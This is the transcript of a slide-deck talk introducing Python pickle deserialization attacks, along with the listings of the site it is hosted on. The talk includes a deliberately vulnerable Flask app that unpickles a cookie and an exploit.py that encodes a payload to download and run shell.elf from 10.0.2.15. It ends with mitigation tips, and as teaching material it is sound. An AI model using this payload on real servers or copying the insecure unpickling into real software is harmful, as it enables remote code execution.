Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Introduction to Deserialization Attacks

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for Ayush Priya Ayush Priya
November 16, 2021
Technology
2
670

Introduction to Deserialization Attacks

This talk provides an introduction to identifying and exploiting Deserialization Attacks with a sample scenario created with Python.

Avatar for Ayush Priya

Ayush Priya

November 16, 2021
Tweet

More Decks by Ayush Priya

See All by Ayush Priya
Scrubbing PII from Logs in LogStash
Avatar for Ayush Priya ayushpriya10
0
820
Introduction to Fuzzing with AFL
Avatar for Ayush Priya ayushpriya10
0
36
Web Assembly for Hackers
Avatar for Ayush Priya ayushpriya10
0
55

Other Decks in Technology

See All in Technology
オープンウェイトのLLMリランカーを契約書で評価する / searchtechjp
Avatar for Sansan R&D sansan_randd
1
290
全員が「作り手」になる。職能の壁を溶かすプロトタイプ開発。
Avatar for hokuto hokuo
1
610
re:Inventで見つけた「運用を捨てる」技術。
Avatar for shinji ezaki ezaki
1
150
2026年はチャンキングを極める!
Avatar for shibuiwilliam shibuiwilliam
7
1.4k
BPaaSオペレーション・kubell社内 n8n活用による効率化検証事例紹介
Avatar for kubell kubell_hr
0
340
習慣とAIと環境 — 技術探求を続ける3つの鍵
Avatar for azukiazusa azukiazusa1
3
800
人はいかにして 確率的な挙動を 受け入れていくのか
Avatar for vaaaaanquish vaaaaanquish
4
3k
最速で価値を出すための プロダクトエンジニアのツッコミ術
Avatar for Kazuto Ohara kaacun
1
320
re:Inventで出たインフラエンジニアが嬉しかったアップデート
Avatar for nagisa_53 nagisa53
4
220
AWS Amplify Conference 2026 - 仕様からリリースまで一気通貫 生成 AI 時代のフルスタック開発
Avatar for Riku INADA inariku
3
400
みんなだいすきALB、NLBの 仕組みから最新機能まで総おさらい / Mastering ALB & NLB: Internal Mechanics and Latest Innovations
Avatar for 株式会社カミナシ kaminashi
0
110
Claude Codeベストプラクティスまとめ
Avatar for みのるん minorun365
50
28k

Featured

See All Featured
10 Git Anti Patterns You Should be Aware of
Avatar for Lemi Orhan Ergin lemiorhan
PRO
659
61k
JavaScript: Past, Present, and Future - NDC Porto 2020
Avatar for David Neal reverentgeek
52
5.8k
B2B Lead Gen: Tactics, Traps & Triumph
Avatar for Sophie Logan marketingsoph
0
46
jQuery: Nuts, Bolts and Bling
Avatar for Doug Neiner dougneiner
65
8.4k
Discover your Explorer Soul
Avatar for Emna emna__ayadi
2
1.1k
Test your architecture with Archunit
Avatar for Yoan thirion
1
2.1k
Odyssey Design
Avatar for Ryan Kendrick rkendrick25
PRO
0
470
The Organizational Zoo: Understanding Human Behavior Agility Through Metaphoric Constructive Conversations (based on the works of Arthur Shelley, Ph.D)
Avatar for Dr. Kim W Petersen kimpetersen
PRO
0
230
Building a Scalable Design System with Sketch
Avatar for Laura Van Doore lauravandoore
463
34k
Navigating the Design Leadership Dip - Product Design Week Design Leaders+ Conference 2024
Avatar for Andy Polaine apolaine
0
160
XXLCSS - How to scale CSS and keep your sanity
Avatar for Zaharenia Atzitzikaki sugarenia
249
1.3M
Highjacked: Video Game Concept Design
Avatar for Ryan Kendrick rkendrick25
PRO
1
280

Transcript

  1. Deserialization Attacks

  2. Ayush Priya VIT, Vellore @ayushpriya10 https://ayushpriya.com https://www.linkedin.com/in/ayushpriya10

  3. Overview: • What is serialization? • Why do we serialize

    stuff? • Demo • Mitigation

  4. What is serialization? • Converting objects to storable data •

    Also known as marshalling • Deserialization - retrieving objects from serial data

  5. Why do we serialize stuff? • Interoperability • Transfer over

    networks • Storage

  6. An example..

  7. import pickle import os class BadUserClass(): def __init__(self, username): self.username

    = username def __reduce__(self): return (self.__class__, (os.system("whoami"),)) bad_user_obj = BadUserClass("ayush") serialized_obj = pickle.dumps(bad_user_obj) # Insecure deserialization user = pickle.loads(serialized_obj) print("Hello!, {}".format(user.username)) # Output: # desktop-fsv539h\ayush # Hello!, 0

  8. A more realistic example..

  9. # flask_app.py import os import pickle from uuid import uuid1

    from flask import Flask, make_response, request from base64 import b64encode, b64decode # The User Class which assigns a random ID to each connection class UserID: def __init__(self, uuid=None): self.uuid = str(uuid1()) def __str__(self): return self.uuid # The main Flask Backend app = Flask(__name__) @app.route('/', methods=['GET']) def index(): obj = request.cookies.get('uuid') if obj == None: msg = "Seems like you didn't have a cookie. No worries! I'll set one now!" response = make_response(msg) obj = UserID() response.set_cookie('uuid', b64encode(pickle.dumps(obj))) return response else: return "Hey there! {}!".format(pickle.loads(b64decode(obj))) if __name__ == "__main__": app.run(host='0.0.0.0')

  10. What we need to do? • Create a payload •

    Serialize it, get Base64 value • Modify cookie’s value

  11. # exploit.py import os import pickle from base64 import b64encode

    PAYLOAD = "cd /tmp && wget http://10.0.2.15/shell.elf && chmod +x shell.elf && ./shell.elf" class Exploit(object): def __reduce__(self): return (eval, ("os.system('" + PAYLOAD + "')",)) exploit_code = pickle.dumps(Exploit()) print(b64encode(exploit_code)) # Output is: b'gANjYnVpbHRpbnMKZXZhbApxAFhcAAAAb3Muc3lzdGVtKCdjZCAvdG1wICYmIHdnZXQgaHR0cDovLzEwLjAuMi 4xNS9zaGVsbC5lbGYgJiYgY2htb2QgK3ggc2hlbGwuZWxmICYmIC4vc2hlbGwuZWxmJylxAYVxAlJxAy4='

  12. Mitigation • Don’t deserialize data from untrusted source • Limited

    access privileges • Safe deserialization methods

  13. Thank You!